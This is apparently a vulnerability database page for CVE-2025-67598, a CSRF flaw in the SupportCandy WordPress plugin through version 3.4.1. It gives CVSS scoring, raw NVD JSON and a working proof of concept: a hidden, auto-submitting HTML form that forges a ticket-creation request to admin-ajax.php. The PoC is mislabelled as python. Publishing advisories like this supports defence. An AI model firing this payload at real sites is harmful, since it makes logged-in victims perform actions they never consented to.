Security Vulnerability Report
中文
CVE-2025-67598 CVSS 4.3 MEDIUM

CVE-2025-67598

Published: 2025-12-09 16:18:38
Last Modified: 2026-04-27 18:16:46

Description

Cross-Site Request Forgery (CSRF) vulnerability in PSM Plugins SupportCandy supportcandy allows Cross Site Request Forgery.This issue affects SupportCandy: from n/a through <= 3.4.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SupportCandy WordPress Plugin <= 3.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-67598 - SupportCandy Plugin --> <!-- This PoC demonstrates a CSRF attack to create/modify a ticket in SupportCandy --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - SupportCandy</title> </head> <body> <h1>CSRF PoC for CVE-2025-67598</h1> <p>This PoC demonstrates the CSRF vulnerability in SupportCandy plugin <= 3.4.1</p> <!-- Auto-submit form to create/modify ticket --> <form id="csrfForm" action="https://target-site.com/wp-admin/admin-ajax.php" method="POST" style="display:none;"> <input type="hidden" name="action" value="sa_support_candy_create_ticket"> <input type="hidden" name="ticket_title" value="Malicious Ticket Created via CSRF"> <input type="hidden" name="ticket_description" value="This ticket was created by an attacker via CSRF vulnerability"> <input type="hidden" name="ticket_priority" value="high"> <input type="hidden" name="ticket_category" value="1"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); console.log('CSRF request sent'); </script> <p>If successful, a new ticket will be created/modified without user consent.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67598", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:38.163", "lastModified": "2026-04-27T18:16:46.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in PSM Plugins SupportCandy supportcandy allows Cross Site Request Forgery.This issue affects SupportCandy: from n/a through <= 3.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/supportcandy/vulnerability/wordpress-supportcandy-plugin-3-4-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}